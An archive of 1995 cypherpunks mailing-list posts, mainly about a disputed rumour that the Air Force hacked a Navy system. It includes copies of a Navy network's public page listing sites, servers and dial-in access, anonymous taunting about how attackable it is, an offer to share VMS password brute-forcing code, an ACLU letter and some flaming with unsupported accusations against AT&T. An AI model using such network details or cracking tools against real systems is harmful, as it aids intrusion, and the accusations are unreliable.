>              + DASN/C3I

Oh no ... it's worse ... *sigh* ... 

no wonder that Newt and Dole had such a grim look on their faces when they
emerged from their scheduled one-hour, (went for two) meeting with the US
President -- the one that was the day before the freshman congress persons
did their incredible end-run on their own leadership. 

Impressive.  Truly.

What would have caused both Newt and Dole to flush like they did?  Did
they demo a hack into the personal e-mail of the Vice-Chairman of the JCS? 

>    * New Web server installed
>         o "neelix", a Sun SparcServer 1000, installed outside firewall
>         o "www.nosc.mil" now points at neelix

Pretty firewall ... nice firewall ... <p>

>    * Enhancing Infrastructure to provide ISDN dialup service

Good idea.  ISDN dialup provides significant bandwidth.  Very significant
bandwidth. Almost enough to control a battleship.  (If there were any
battleships, I mean). 

>    * Upgrading D.C. area connectivity to Metropolitan Fiber service at 10
>      Mbps
>    * Getting sites 100% connected (TCP/IP to every desktop)
>    * Developing MIME to X.400 gateway for connectivity to DMS world

Yep.  Perfect.  Just what the doctor ordered.  TCP/IP to every desktop.
And MIME for all.  Oh, and to ice the cake, toll-free ISDN dial-ins.

Hmm, let's see ... for Christmas Santa ... I'd like a packet-switched 
network with a public outdial to a toll-free ISDN dial-in ... oh, that 
and a Gulfstream V under the Christmas tree.

What are they going to do next, give everyone some Czechoslovakian C-4?

Stick a bit of civilian software into all of this, and let's all have a
good look at whether someone can take over something a little more
interesting than a battle ship. 

Like maybe an aircraft carrier?? 

Gee, that oughta harden their drawers ...



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

P.P.S.  Feel free to repost widely ... IW ... c4i-pro ... wherever ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Sat, 23 Dec 1995 07:24:30 +0800
To: :@shore.net
Subject: Re: Navy hacked by Air Force?
Message-ID: <v02130505ad00cd3a2c68@[198.115.178.219]>
MIME-Version: 1.0
Content-Type: text/plain


        This might be relevant. This is a page from the NCCOSC web site
<http://www.nosc.mil>

        The Naval Command, Control  & Ocean Surveillance Center (NCCOSC) is
the U.S. Navy's warfare center for command, control and communication
systems and ocean surveillance and the integration of those systems which
overarch multiplatforms. NCCOSC is based in San Diego, CA.

        NCCOSC Command Internet (NCI) is part of NCCOSC, of course -- and
NCCOSC is part of SpaWar (Space and Naval Warfare Systems Command.)  Clear?

        Note that NCCOSC recently decided to beef up NCI's user
authentication.  See "Current Initiatives."

=================
[* ] NCI net - What it is

   * An enterprise network serving NCCOSC and other communities of interest
   * Modelled after the global Internet, logically part of the Internet
   * Communications nodes at each NCCOSC site, linked by T-1 lines
   * Nodes consist of...
        o Cisco router linking T-1 lines and local LANs
        o  Annex terminal server and modem bank for dialup, SLIP, and PPP
          access
        o Sun servers providing general Internet services (email, name
          service, ftp server, world wide web, multicast routing, etc.)
        o NeXT server supporting corporate office functions
   * Provides ubiquitous high-speed low-delay TCP/IP connectivity throughout
     the organization and to the Internet
   * Provides dialup access from home or TDY via 1-800 number, including
     SLIP and PPP support

[* ] [ ]  Network Topology

[* ] Recent activities and milestones

   * MIME adopted as corporate email standard, email systems upgraded
        o Many user agents upgraded to MIME compliance
        o Testing gateways for interoperability with non-compliant systems
        o Performing extensive interoperability tests
   * New sites connected
        o CINCLANTFLT, Norfolk, VA
        o The Pentagon
             + BRAC Office
             + OSS LAN
             + DASN/C3I
        o FTSCLANT (Portsmouth, VA) and NAVSEACENPAC (San Diego, CA)
        o Armed Forces Staff College, Norfolk, VA
        o USACOM site in Suffolk, VA
             + Joint Training, Analysis, and Simulation Center (JTASC)
             + NISE East Contingent at USACOM
        o NISE West Guam
        o NISE West Yokosuka Japan
   * Network accredited
        o Completed Security Test and Evaluation
        o Completed Risk Assessment
        o Published Contingency Plan and Configuration Management Plan
   * Network now under full configuration management
   * New Web server installed
        o "neelix", a Sun SparcServer 1000, installed outside firewall
        o "www.nosc.mil" now points at neelix
        o "Planet Earth" now served by neelix
        o Recent updates
             + 1 additional Sparc processor (completed 6/9/95)
             + 4 Gb more disk (completed 6/2/95)
             + another 64 Mbytes of memory (giving total of 96 Mbytes)
               (completed 6/2/95)
             + conversion to "Apache" http server (faster) (completed
               6/1/95)

[* ] Current Initiatives

   * Enhancing Infrastructure to provide ISDN dialup service
   * Implementing one-time-passwords using SecurID cards
   * Implementing Kerberos based authentication for additional security
   * Connecting additional sites
        o NISMC
        o USACOM at CINCLANT compound, Norfolk, VA
        o Pearl Harbor Naval Shipyard, Pearl Harbor, HI
        o Federal Internet Exchange (FIX) East, College Park, MD
        o New NISE East Detachment at Naval Weapons Station, Yorktown, VA
        o ONI at NMIC
   * Upgrading D.C. area connectivity to Metropolitan Fiber service at 10
     Mbps
   * Getting sites 100% connected (TCP/IP to every desktop)
   * Developing MIME to X.400 gateway for connectivity to DMS world

[* ] References

   * Dialup Quick Guide
   * Monthly Reports
   * June 28 Internet Security Briefing (postscript)

    Vin McLellan +The Privacy Guild+ <vin@shore.net>
 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sat, 23 Dec 1995 06:46:40 +0800
To: dreschs@austnsc.tandem.com
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <55g2ec4xp8.fsf@galil.austnsc.tandem.com>
Message-ID: <9512222132.AA21783@all.net>
MIME-Version: 1.0
Content-Type: text


...
Not to be picky, but...

> 1) The correction makes a difference in the credibility of the
> statement, as you must have felt, since you made the change.

I agree that the change was important, but...

>  Saying
> that a reporter called a 40-ish Navy captain a 'whizzkid' is foolish,
> while questioning the reasonableness of a reporter calling a 20-ish Air
> Force captain a 'whizzkid' is a difference of opinion (see below).

We don't yet know how old he or she was - let's wait and see before we
jump the gun. 

> Since you said it was the 'actual text', you should have posted the
> actual text, not your correction of it.

My text was the one published in the IW forum - Risks published first,
the error was apparently found and corrected, and thus the IW forum had
the corrected text.  I will ask iw to inform Risks of the correction -
however, I did post the actual text that I got from IW!  This IT is
so complex, isn't it?

> If they sent out two messages,
> one correcting the other, I find it somewhat difficult to believe that
> they didn't at least preface it with a "sorry, we goofed" tag.

They were to different forums, hence the "I goofed" tag would seem
inappropriate in IW.  Perhaps the next Risks will include an 'I goofed' -
let's wait and see.

> FC> Even with only 4 years of service (after graduating from College),
> FC> 25-27 years old is no longer whizzkid age in my book.
> 
> 2) As I said before, had I remained in ROTC, I would have been 24 when
> I was eligible to make captain.
> 
> 3) At 26, I was still being referred to, by non computer-savvy people,
> in terms comparable to 'whizzkid'.

I must be getting old.  When I was growing up, all Wiz kids had to be 21
or less.  I guess the media is running out of 18-year-olds making a big
splash.

...
> 5) The second independent source backs up the report that the connection
> was made through the Internet, involving email connectivity, and with a
> personal computer and modem, all of which were specifically denied in
> the message from IW.

I must have read it differently.  I thought that IW said something like
not all email messages, and email messages did not reproduce, not that
there were no email messages involved.  I guess we both have to start
reading more carefully.

> 	Now that I've addressed ALL of the points in the 'denial' from
> IW, do you see why I characterized it as a military smokescreen?  The
> only thing in it which remains unchallenged is that the original report
> is inaccurate in detail, and that there is a question as to whether
> someone in their mid-20s is a 'whizzkid'.

I think that the whole issue is still pretty questionable - whether the
experiment was authorized - whether it was a wiz kid - whether they
actually took control - whether it came from the Internet or a Mil net -
whether there was insider knowledge - etc.  One thing I am becoming more
certain of though - that there are no active battleships.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lynnclu@aol.com
Date: Sat, 23 Dec 1995 12:25:16 +0800
To: ACLUNATL@aol.com
Subject: ACLU Cyber-Liberties Update, 12/22/95
Message-ID: <951222163250_21785823@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------
December 22, 1995
ACLU CYBER-LIBERTIES UPDATE
A bi-weekly e-zine on cyber-liberties cases and controversies
at the state and federal level.
----------------------------------------------------------------
IN THIS ISSUE:

*    ACLU Letter to U.S. Senators Opposing the Telecommunications
Deregulation Bill, S. 652 (H.R. 1555) As Reported by the Conference Committee

----------------------------------------------------------------
FEDERAL PAGE (Congress/Agency/Court Cases)
----------------------------------------------------------------

December 22, 1995
Via Fax

     Subject:  Why the Telecommunications Deregulation Bill, S. 652 (H.R. 1555),
               As Reported by the Conference Committee Should Be Rejected


Dear Senator:

The American Civil Liberties Union urges you to vote against S. 652 (H.R.
1555), the telecommunications deregulation bill as reported by the conference
committee.  The conference committee has produced a bill that will immediately
damage freedom of expression, the bedrock value at the core of the First
Amendment and will structure the telecommunications industry so that free
speech and privacy are in permanent jeopardy.  While the final text is still
being written, these provisions are sufficiently destructive that they warrant
rejection of the entire bill.

Many reasons could be cited why S. 652 should be rejected;  we will focus on
just three areas where the conferees have needlessly chosen to attack
essential First Amendment values.

 I.  The "Deregulation" Bill Will Establish a Big Government Censorship
     Regime with New Speech Crimes for the Internet and Online Communications.

Title V of the telecommunications bill as adopted by the conference committee
will:

-    Subject first-year college students under 18 to two years in prison and
$100,000 fine if they engage in overly salacious dating patter online (even
in their private e-mail).

-    Subject parents to the same prison term and fine if they provide their
own teen-ager with online materials that the parents have decided have merit
if the material is deemed to violate the bill.

-    Subject adults merely looking on their own home computer at something
deemed obscene to prison for five years for the first peek, plus another ten
years if they look again.  This is not far-fetched.  Electronic "footprints"
are left behind whenever a user goes somewhere in cyberspace.  Some of the
censorship groups backing the bill openly support prosecuting anyone who looks
at such material as a way of "drying up" demand for it -- so these groups have
an incentive to pressure prosecutors to follow those footprints back to the
adults at home.

-    Effectively reduce voluntary communications among consenting adults to
those appropriate only for children.  Much of what consenting adults -- even
married consenting adults -- prize about some of their communications could
well be deemed by outsiders as indecent if addressed to minors.  The bill will
infantilize all communications in cyberspace as users worry about how to avoid
prosecution if prohibited material is sought out by someone underage.  The
educational value of the Internet would be reduced to the equivalent of the
children's section in the video store.

-    Define its new speech crimes so broadly that it will hold access and
service providers criminally liable for content they did not create unless the
providers have legal departments large and skilled enough to utilize limited
and vague defenses.  Even then, the defenses would have to be established in
costly and time-consuming court proceedings.  The predictable effect will be
enormous self-censorship, coerced by the government's failure to precisely
define what is being made criminal and the threat of prison for transgressors.

-    Subject all Americans to the most narrow of community standards found in
the most socially limiting of locations.  Even those who have chosen to adopt
the social mores of such locations should not insist on imposing those mores
on the millions of Americans who have chosen to live elsewhere.

These proposals violate the Constitution.  They are also profoundly bad
public policy.
          
Title V of the bill is unconstitutional because it takes speech protected by
the First Amendment and tries to regulate it in a way that violates what the
Supreme Court has said must be the touchstone for regulating protected
speech.  For example, the bill fails to use the constitutionally required
"least restrictive means" to obtain its putative goals.  It also fails to
take into account the particular characteristics of interactive media in the
online environment, rendering its attempt to create new speech crimes
constitutionally impermissible.  Title V also unconstitutionally invades the
privacy rights of those who communicate online.   

Cyberspace is the first genuinely mass medium in human history, where many
individuals can speak to many others at the same time, and where the
"start-up" costs of "publishing" are so minimal that almost all users are
potential publishers.  This is a democratic and truly libertarian
communications medium without a centralized governing body.  There is no
network president or standards department, for example, ultimately overseeing
everything that is broadcast -- in fact there is no "network" but instead an
endless series of independent areas like newsgroups, chat rooms, bulletin
boards and web sites.  The conference bill tries to force cyberspace into the
mold of the old media with a government-dictated, centralized command
structure.

Cyberspace gives its users -- including parents concerned about their
children -- an unprecedented power over what materials are accessed, or not
accessed, from their computers.  Parents, for example, already have available
software and other technology that will let them control what their children
access from their computer.

Tragically, the conferees have rejected further private sector development of
user empowerment technologies.  Instead, the conference bill imposes the most
restrictive regime of government regulation over content on what should be
the least governmentally restricted of all media.  In doing so, the bill
would strangle cyberspace, violating the free speech and privacy rights of
all those who communicate online.

The ACLU believes that all adults have the right to choose for themselves
what they see or say online.  The conferees have chosen to invest a minority
of  censorship extremists with the coercive power of the criminal law and
Federal prison in order to impose on the rest of us their constricted view of
what we should say or see. 

This is a truly historic turning point.  Title V of the bill from the
conference committee confronts the Congress with a stark choice: 
     
-    Will the 104th Congress be seen in history as one who stood up for the
freedom of communications in cyberspace and the Internet, or will it be
counted as a tool of certain censorship groups determined to impose their
conception of "proper" speech on all of us?

-    Will the 104th Congress stand up for the continuing vitality of private
sector development of interactive media, or will it impose a big-government
bureaucratic regulatory regime on cyberspace and the content of its
communications?

-    Will the 104th Congress stand up for empowering users -- including
parents concerned about their children -- to control what material is
accessed from their computers, or will it give the coercive power of federal
prison sentences to censorship groups who care more about interfering with
what other adults see or say than about protecting their own children?

II.  The "Deregulation" Bill Will Impose a Big-Government Censorship Regime
     on Television Programming.

The conference committee has agreed to V-chip language in S. 652 that will
stifle expression on broadcast and cable television and prevent parents from
exercising greater control over their children's television viewing habits.
The V-chip provision will vest the government, not parents, with control
over which television programs make their way to the family television set.

The V-chip hardware is technology that will automatically block a program
from television reception if it carries a certain encoded rating in its
transmission.  The encoding would be transmitted on the same signal that
currently carries closed captioning information.  

However, the V-chip requirement does more than simply call for new hardware
in television sets; the bill would set up a television rating system driven
by government guidelines on content.  Although the television industry is
given a one-year window to "voluntarily" develop and transmit an encoded
ratings scheme for violent, sexual, or indecent programming, the Federal
Communications Commission would have the power to reject the industry's
system in favor of its own.  In this way,  the government ultimately decides
what content is appropriate for viewing and what is not.

The bill calls for the government to form an "advisory committee" to set
recommendations for guidelines on rating content, and those guidelines will be
formally issued by the FCC.  Although the V-chip's congressional sponsors
have claimed that these guidelines will not be mandatory, the ratings
guidelines will surely have a chilling effect on the creative process in
television programming. Would producers make a television mini-series about
the violent Civil War?  Perhaps not, if the broadcast will automatically be
blocked from the television sets of countless families who will not have the
opportunity to make an independent judgement as to the program's
appropriateness. 

The weightiest and clearest guidelines for content rating would be that of
the government. Such chilling of expression by the government violates the
First Amendment.  The Supreme Court has held that violent expression enjoys
full constitutional protection.  Furthermore, what would constitute "sexual"
expression would be left up to the government's advisory committee or the
industry's "voluntary" internal censors.  Would a news program or documentary
on breast cancer be blocked as "sexual" expression?  That answer is yet
unclear, but what is clear is that the encoded ratings will block expression
fully protected by the First Amendment.

Furthermore, the V-chip scheme created by Congress completely shuts out
families from the decision making process.  Instead, it empowers bureaucrats
and television executives to make decisions for parents.  Would the V-chip's
automatic censors block out such "violent" programs as "Schindler's List,"
"Roots," or "The Burning Bed"?   

Other options for true parental control and choice in children's television
viewing will be destroyed by the government's V-chip mandate.  Private
companies have recently developed technology, such as the Telecommander and
the TV Guardian, that would empower parents to screen out the programs or
stations that they feel are inappropriate for their children.  Additionally,
there is the possibility of a true "choice chip," which would allow parents to
subscribe to the private rating service of their choice, whether run by the
National PTA, TV Guide or the Christian Coalition.

Technology and initiatives developed by private business will be crushed by
the government's mandatory censoring technology and ratings system.  The
government will step in as a surrogate parent to turn off the television when
a child turns to the "wrong" channel.  However, the government's version of
what is "wrong" might include a documentary, an afterschool special, or other
programming that a parent would actually want their child to watch.  Thus,
the "V" in V-chip is for the government's "victory" over parental control and
the First Amendment.

III. The Bill Will Foster Communications Monopolies that Stifle
     Diversity and Free Speech.

A core value of the First Amendment's guarantees of free speech and free
press is the vital role in preserving liberty played by robust discussion of
public issues among a diversity of viewpoints.

Unfortunately, the bill undoes much of the existing protection ensuring
diversity in points of view by allowing a greater concentration of media.
The conference report would, for example, allow the FCC to use waivers so
that a single corporation could own the television station, radio station,
cable system, newspaper, phone company and Internet access provider in a
locality.  On the national level, the bill will allow a greater concentration
of control over programming sources.

No clearer example exists of the destructive impact on free speech such media
concentration will have than CNN's recent rejection of advertisements
opposing the telecommunications bill itself.  CNN's corporate owners, of
course, have vital interests generally being advanced by the bill, but the
decision to reject opposing ads (followed up by a decision to reject all ads
on the bill -- when the issue was generally developing in favor of CNN's
owners) is the kind of content control that will only be repeated as media
concentration increases. 

Conclusion

The American Civil Liberties Union urges you to oppose the conference version
of S. 652 (H.R. 1555), the telecommunications deregulation bill because it
will impose new speech crimes on cyberspace and  new censorship on television
programming, as well as jeopardize the future of free speech in this country
by destroying the diversity of media ownership.

Sincerely yours,

Laura W. Murphy
Director


Donald Haines
Legislative Counsel

----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE
----------------------------------------------------------------
Stay tuned for news on the ACLU's world wide web site, under construction at
http://www.aclu.org/.  America Online users should check out our live chats,
auditorium events, *very* active message boards, and complete news on civil
liberties, at keyword ACLU.

----------------------------------------------------------------
ACLU Cyber-Liberties Update
Editor: Ann Beeson (beeson@aclu.org)
American Civil Liberties Union National Office
132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Cyber-Liberties Update, send a message to
cyber-liberties@aclu.org with "subscribe Cyber-Liberties Update" in the
subject line of your message.  To terminate your subscription, send a message
to cyber-liberties@aclu.org with "unsubscribe" in the subject line.

For general information about the ACLU, write to info@aclu.org.
----------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Sat, 23 Dec 1995 06:26:24 +0800
To: cypherpunks@toad.com
Subject: Re: Navy hacked by Air Force?
Message-ID: <v02130506ad00d56c1943@[198.115.178.219]>
MIME-Version: 1.0
Content-Type: text/plain


        This might be relevant. This is a page from the NCCOSC web site
<http://www.nosc.mil>

        The Naval Command, Control  & Ocean Surveillance Center (NCCOSC) is
the U.S. Navy's warfare center for command, control and communication
systems and ocean surveillance and the integration of those systems which
overarch multiplatforms. NCCOSC is based in San Diego, CA.

        NCCOSC Command Internet (NCI) is part of NCCOSC, of course -- and
NCCOSC is part of SpaWar (Space and Naval Warfare Systems Command.)  Clear?

        Note that NCCOSC recently decided to beef up NCI's user
authentication.  See "Current Initiatives."

=================
[* ] NCI net - What it is

   * An enterprise network serving NCCOSC and other communities of interest
   * Modelled after the global Internet, logically part of the Internet
   * Communications nodes at each NCCOSC site, linked by T-1 lines
   * Nodes consist of...
        o Cisco router linking T-1 lines and local LANs
        o  Annex terminal server and modem bank for dialup, SLIP, and PPP
          access
        o Sun servers providing general Internet services (email, name
          service, ftp server, world wide web, multicast routing, etc.)
        o NeXT server supporting corporate office functions
   * Provides ubiquitous high-speed low-delay TCP/IP connectivity throughout
     the organization and to the Internet
   * Provides dialup access from home or TDY via 1-800 number, including
     SLIP and PPP support

[* ] [ ]  Network Topology

[* ] Recent activities and milestones

   * MIME adopted as corporate email standard, email systems upgraded
        o Many user agents upgraded to MIME compliance
        o Testing gateways for interoperability with non-compliant systems
        o Performing extensive interoperability tests
   * New sites connected
        o CINCLANTFLT, Norfolk, VA
        o The Pentagon
             + BRAC Office
             + OSS LAN
             + DASN/C3I
        o FTSCLANT (Portsmouth, VA) and NAVSEACENPAC (San Diego, CA)
        o Armed Forces Staff College, Norfolk, VA
        o USACOM site in Suffolk, VA
             + Joint Training, Analysis, and Simulation Center (JTASC)
             + NISE East Contingent at USACOM
        o NISE West Guam
        o NISE West Yokosuka Japan
   * Network accredited
        o Completed Security Test and Evaluation
        o Completed Risk Assessment
        o Published Contingency Plan and Configuration Management Plan
   * Network now under full configuration management
   * New Web server installed
        o "neelix", a Sun SparcServer 1000, installed outside firewall
        o "www.nosc.mil" now points at neelix
        o "Planet Earth" now served by neelix
        o Recent updates
             + 1 additional Sparc processor (completed 6/9/95)
             + 4 Gb more disk (completed 6/2/95)
             + another 64 Mbytes of memory (giving total of 96 Mbytes)
               (completed 6/2/95)
             + conversion to "Apache" http server (faster) (completed
               6/1/95)

[* ] Current Initiatives

   * Enhancing Infrastructure to provide ISDN dialup service
   * Implementing one-time-passwords using SecurID cards
   * Implementing Kerberos based authentication for additional security
   * Connecting additional sites
        o NISMC
        o USACOM at CINCLANT compound, Norfolk, VA
        o Pearl Harbor Naval Shipyard, Pearl Harbor, HI
        o Federal Internet Exchange (FIX) East, College Park, MD
        o New NISE East Detachment at Naval Weapons Station, Yorktown, VA
        o ONI at NMIC
   * Upgrading D.C. area connectivity to Metropolitan Fiber service at 10
     Mbps
   * Getting sites 100% connected (TCP/IP to every desktop)
   * Developing MIME to X.400 gateway for connectivity to DMS world

[* ] References

   * Dialup Quick Guide
   * Monthly Reports
   * June 28 Internet Security Briefing (postscript)

    Vin McLellan +The Privacy Guild+ <vin@shore.net>
 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sat, 23 Dec 1995 06:21:47 +0800
To: Alex de Joode <usura@berserk.com>
Subject: Re: CFS and Linux
In-Reply-To: <199512222107.WAA00408@asylum.berserk.com>
Message-ID: <199512222143.QAA14493@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


>two comments for matt thoo:
>  1: please make it install 'out-of-the-box' on Linux.
> 

I'd love to.  It isn't that simple.  No one has ever told me exactly what
"the Linux problem" is or even convinced me that a problem actually exists.

I don't run Linux.  People who do run Linux are divided between telling
me that it does run out-of-the-box and that it doesn't.  ALL I can do is
pass on patches that the people who run CFS under Linux give me.  My
understanding is that CFS does run out-of-the-box under some of the
all-too-many varieties of Linux, but that it depends very much on your
particular configuration (particularly your rpcgen version).  Some
configurations require some tweaking.  If you want to see CFS supported
out-of-the-box on a particular platform, someone has to tell me about it
and supply me with the fixes, which I will gladly wrap into the distribution.
Requests that I make something work on a platform that I don't have and
don't control are very frustrating.

Anyway, this is the wrong list for this.  Linux issues come up every now and
then on the cfs-users mailing list (cfs-users-request@research.att.com;
subscription info included in the distribution).

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Sat, 23 Dec 1995 07:12:31 +0800
To: cypherpunks@toad.com
Subject: Re: Navy hacked by Air Force?
Message-ID: <v0213050aad00da5e42cf@[198.115.178.219]>
MIME-Version: 1.0
Content-Type: text/plain


        Drescher/Cohen/Drescher/Drescher/Cohen/Cohen....

        I'm new to C'punks, so I don't yet have a grip on the context in
which you consider privacy, property, and other ultimate values.  I do
wonder, though: Do you spend a lot of time pissin' on each other's shoes
like this?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an170150@anon.penet.fi
Date: Sat, 23 Dec 1995 04:02:03 +0800
To: cypherpunks@toad.com
Subject: No subject
Message-ID: <9512221713.AA19435@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Hi, excuse me for interrupting your conversation with a different subject,
but I am not on the list (any longer, due to the bandwidth) so please
reply "directly" to me at an170150@anon.penet.fi    ...my question is:

Are there any other anon servers running the same software as the
one @alpha.c2.org?


--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Sat, 23 Dec 1995 08:23:01 +0800
To: cypherpunks@toad.com
Subject: Houston C'punk gathering
Message-ID: <9512222346.AA01818@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain



For C'punks in the Houston area, there will be an informal gathering 
at Strack's Restaurant, tomorrow at approx. 11:00 a.m.

I will attempt to get there a little early, and I will be the one with a red 
Lamborghini Countach on the table.  Just come up and sit down.  
Strack's has a breakfast buffet which is reasonably priced, or at 
least it was the last time I went there.

Possible Topics for Discussion:

I will also be bringing the encryption algorithms used by VMS (the 
AUTODIN-II, Purdy with salted input, Purdy (Purdy V) with variable 
length username, and the Purdy (Purdy S) with additional bit 
rotation).  I have tested these under VMS 6.2 and they seem to 
work fine, although they could be (and should be) optimized for 
brute forcing.

I will also be bringing some password brute forcing code that 
utilizes the system services to encrypt the password (and punch CPU 
usage through the roof).  It will crack a three character password 
in under a minute on a loaded AXP 3000LX.  

I will also be bringing a copy of the infamous _Giant Black Book of 
Computer Viruses_ by Mark Ludwig.  Interesting stuff.  

Directions (from Houston):

 	Take I-45 North.  You will pass 1960 and then will drive 
through a stretch of road riddled with construction barrels.  Do not 
exit Holzworth, but take the next exit (Louetta).  Get on Louetta 
(you will have to make a right turn and you will be on the overpass), 
and take the overpass west towards Tomball.

	You will cross through several intersections, Strack's 
will be on your left, after you cross Kukendaul (approx. 1-2 miles 
ahead).

	If anyone gets lost, or wants more info you can page me
at: (713) 866-0989.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Dec 1995 08:42:50 +0800
To: cypherpunks@toad.com
Subject: Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE??
In-Reply-To: <199512222111.NAA24171@jobe.shell.portal.com>
Message-ID: <199512222355.SAA04987@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> Everyone should ask this question.  AT&T can sign-on to a two-page ad,
> calling on Congress to balance the budget -- to cut off veterans, and
> cut-off women with dependent children just before Christmas.  It can
> sign on to this, but it can't bother to even offer a scholarship to
> the students who helped make its fortunes.  It would rather leave the
> impression that it freeloads off of other's efforts.
> 
> It's shameful.

God, you are annoying Fred, ER, I meant, "Alice".

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sat, 23 Dec 1995 08:50:20 +0800
To: cypherpunks@toad.com
Subject: IW Mailing List iw/951222 (fwd)
Message-ID: <9512230004.AA27098@all.net>
MIME-Version: 1.0
Content-Type: text


The following is forwarded from Risks [...s indicate missing regions of text]

> ---------------------------------------------
>    FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
>    ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator
> ...
> Date: Fri, 22 Dec 1995 00:59:09 -0500
> From: RSRMadison@aol.com
> Subject: Re: Naval Battleship takeover (Long, RISKS-17.55)
> 
> A message from the InfoWar list noted that: <<There are NO active US
> battleships!!! And there weren't any last September.>>
> 
> As stated, this is true. However, let the record show that the US Navy still
> flies the flag daily over 1 commissioned battleship, the USS Arizona,
> permanently stationed in Honolulu.
> 
> ...
> Date: Fri, 22 Dec 1995 10:53:56 -0500
> From: Bob Brewin <brewin@access.digex.net>
> Subject: Re: Naval Battleship takeover (Long, RISKS-17.55)
> 
> Yikes.  This story will not die -- it just lives on a Web site at the
> Daily Telegraph in London.  Having worked for a British news
> organization (Reuters) for years, if you believe the Telly story, call
> me about a bridge I have for sale. 
> 
> The Air Force did not hack the Navy over the Internet.  They did it over
> a secure network (SIPRNET) which is firewalled from the Internet. 
> 
> The Air Force conducted this attack with the Navy's knowledge and
> permission. 
> 
> The Navy does not have any battleships on active duty.
> 
> The Air Force did not get control of the nonexistent battleship.
> 
> Yep. This does have the makings of a legend.
> 
> Bob Brewin editor-at-large (whatever that means) federal computer week
> antenna@fcw.com brewin@access.digex.net
> ...

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Dec 1995 09:11:48 +0800
To: vin@shore.net (Vin McLellan)
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <v0213050aad00da5e42cf@[198.115.178.219]>
Message-ID: <199512230006.TAA05018@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Vin McLellan writes:
>         Drescher/Cohen/Drescher/Drescher/Cohen/Cohen....
> 
>         I'm new to C'punks, so I don't yet have a grip on the context in
> which you consider privacy, property, and other ultimate values.  I do
> wonder, though: Do you spend a lot of time pissin' on each other's shoes
> like this?

"Dr." Fred Cohen is a bit of a local pariah. We don't like him much,
and we all pretty much agree that he's an obnoxious weenie (except the
mysterious anonymous "Alice de Nonymous").

I don't know Drescher.

This stuff isn't what this mailing list is for...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 23 Dec 1995 11:39:44 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
Message-ID: <199512230317.TAA19444@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>  1: please make it install 'out-of-the-box' on Linux.

AT&T's refusal to support CFS and other so-called "secure" software
under Linux is typical and to be expected.  Linux, the most popular
alternative to Microsoft, represents a direct threat to AT&T's bread
and butter and to their ability to control the security software market.
The fact that the CFS install programme deletes other security software
is no accident.  We would be foolish to expect them to admit their
malice - they will excuse it as a "mistake" or will ignore it altogether.

I don't agree with all of the "Gates" character's claims against
AT&T, however I think their motives can be summed up in three words:
Greed, Greed, Greed.  Use their software and you support the giant.
Remember their theft from the Berkeley graduate students each
time you accept "free" software from this greedy monster.

I also do not accept Blaze's cowardly defense of his actions and of
his too-comfortable situation; one cannot help but be reminded of
the Nazi "just following orders" prattle repeated rote as they were
called to answer for their crimes.  It rings no less hollow to this
day.  But I will not condemn him, nor will I call on others to do so,
preferring to leave that matter between him and his Maker.

Weinstein, of course, is beast of another color, but that will have
to wait.

Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Sat, 23 Dec 1995 12:25:08 +0800
To: perry@piermont.com
Subject: Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE??
